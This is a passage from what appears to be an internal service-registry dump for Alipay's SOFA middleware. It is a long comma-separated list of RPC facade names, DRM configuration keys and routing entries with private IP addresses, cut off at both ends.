@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:productInventoryRevise_ProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.CrossDateTransCheckDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-peerpay-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.databus.common.service.facade.RPCDrivedStream:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.workflow.common.service.facade.bucuser.BucUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.zhx.facade.ZHXBussinessCertSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.activity.ActivityRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheDRM.refreshKey,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.content.CommentExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmDomainRelConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.162.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zpaascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.scenecustom.api.SceneGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lifemng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.reportorder.KbReportOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_3_2_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.taobao.pentaprism.scene.service.AntFinTaskService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.BizModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.senior.service.facade.PayAbilityEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayRemindDrmResource.pageSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.micloan.agdslibra.facade.service.PersonRiskCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finpwm@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductUserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.channelspop.service.solution.account.facade.SolutionAccountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.idpatrol.core.service.inspect.PromoPmsRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yebplus.common.facade.service.api.baobei.api.query.BBCommonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ProductMaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.discovery.DiscoveryManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.246.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_MFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.maxAvailablePidsCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finfocore.FinfoprodDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.globalremitprod.common.service.facade.api.RemitTranslatePyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.understand.ContentFeatureRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.biz.content.picture.service.PictureRecognitionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.isTopicDowngradeUserInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:supportprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.TaskExecutorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.swiftweb.facade.CubeServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceFinfoApiCtrlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZARMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.pucprod.EbppFieldTypeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.AssFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:mcard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AssistantMessageConsumeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.notice.NoticeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.cacheType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.feeclcn.common.service.facade.ChargeTargetConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.starWishFixedTrigger,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudlego:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.87.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.kwlib:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycap.common.service.facade.adapt.CsWorkTaskQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.core.model.camp.relate.repository.CampRelateDetailRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.DailyCutSuspensionCheckDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.coreapi.facade.TestGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.PdSignRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:finxbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkpromocore_campApproveFailCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.ExecuteService:1.0:sccounter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ISMONITOR#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustcore.common.service.facade.api.RoleRelationAccQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.link.facade.ShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.133.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmTairVersionManager.cdsScenePre,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.cfpcenter.emergency.biz.drm.SystemConfigDrmResource.updateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.ProcessCallback:1.0:antbuservice_antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResIdentifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.SuiteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.210.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kgopen.common.sdk.infra.environment.EnvironmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.mutualtask.MutualtaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.revtrans.core.model.drm.RevtransDrmImpl.taskNums,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.MerchantIndustryExtInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.message.MessageConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.common.service.facade.MNotifyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dmeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pricecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.176.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dsmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ecmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityops.biz.service.secopschange.SecChangeActionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.GeneralOperationStrategyRecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.biz.coupon.detailload.CouponAdcAccountResource.sqlEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insdataprod.common.service.facade.dsb.api.DsbDamageEstimateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.dateservice.MiniAppDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.test:name=com.alipay.securitydata.common.uctfo.storage.client.drm.UctfoStorageResource.phStoreRoute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.groot:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.233.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mobileaix.core.service.training.TrainingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileha.core.service.activity.ActivityReportDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.sql.service.BatchTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityservice.facade.activeservice.IvrQuestionRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.product.ProductConfigFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.hyperlinks.facade.HyperlinksQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.progov.service.api.asbi.AsbiInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.OrderOuterManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.message.GroupMessageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.assettrans.FaAccountInfoQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SecureInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategoryVideoExpansionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.enableDataSyncToNewTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:iotcmgr@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsandbox.service.facade.openAcess.ProjectManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.NewKeyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.InvestmentContractDrm.modifyPlan,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedDeposit2_SysCallback1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.bizorder.BizOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:buservice_process_callback_antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rest.IntendRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinquotationprod.core.service.quotation.CandlestickService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_HUIYU_NOTIFYTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_CLIVEMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantRoleQueryFacade:1.0:mrchmobileStore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.standard.facade.api.ParmTplSeqQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.MerchantServerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.share.PortfolioQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.clientcache.drm.ClientCacheGrayDRM.grayList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cslearn.service.facade.api.TaskFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_mp_rule_white_edit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.126.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.revtrans:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ecdcc:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.UserSecurityRiskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareTracer:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acoffercenter.common.service.facade.metadata.CategoryManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkbcs.common.service.facade.clearing.api.BcsAssetClearingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsCompanyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.budget.BudgetServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcore.repay.service.PcreditRepayBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.query.MobileAckQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:charityprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testtoollist.service.facade.api.MsgScanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.biz.shared.param.SysParamDualReadWrapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dassmeta.common.service.facade.dds.api.ServiceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:overseamng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.mobile.api.QualValidationMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.WareInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.user.MobileUserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:shopCategorySyncHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.rfm.user.service.RfmUserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:amldataproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerVoucherTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.f2fpay.F2fPaySwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.ruleengine.service.biz.MessageHandlerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-fixedDepositAdditionalInfoPMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.datacontext.common.service.facade.limitcum.api.FcCumulateQueryFacade:1.0:ifcdatacontextCumulateQuery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:mpsmodelservicegd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pam.PamResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkkycprod.common.service.facade.trust.dualrecord.service.DualRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hpmweb.OpenTinyApp:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_HERA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.fcbuservice.common.service.facade.OperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cifmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mrchcommons.base.facade.member.MerchantUserRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.common.service.facade.DeviceStatusManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_ZFALCON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.159.247.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.certify.service.facade.CertifyOrgManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zdal.ldc.tair.customerv2_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.FundTaConfirmService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.contact.facade.MailContactSendService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_Topic#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.govbizprodsys.common.service.facade.govbizprodsysconfig.OrgCheckPointConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.106.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.97.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.activity.api.SceneActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.plugincenter.PluginInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.cifcustomer.CustomerQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.account.CfpAdjustVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftCrowdFlowQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstoperation.core.service.sequence.SequenceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercore.biz.facade.InsUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetpreference.api.facade.AssetValuationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditinstallprod.common.service.jfq.JfqBillOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.cifin.censusLogSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:sophon#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prodcore.service.api.product.ProductDifferentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.complain.service.facade.ReportCenterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.group.GroupManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.fsc.facade.RecSolutionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.254.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.core.service.h5.H5FlowGrayMonitorDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.query.SpaceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.26.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.keyMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.157.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publichome.common.service.facade.app.QueryAppOrderStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangeBatchExecService:1.0:antschedulerconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcore.facade.ArchiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.RefundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_TAXREFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.217.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antchaos.facade.api.ChaosAgentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.conf.NotifySubscriptionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmepconnector@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantPageQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.client.drm.TairToTbaseSwitch.switchToTbase,version=3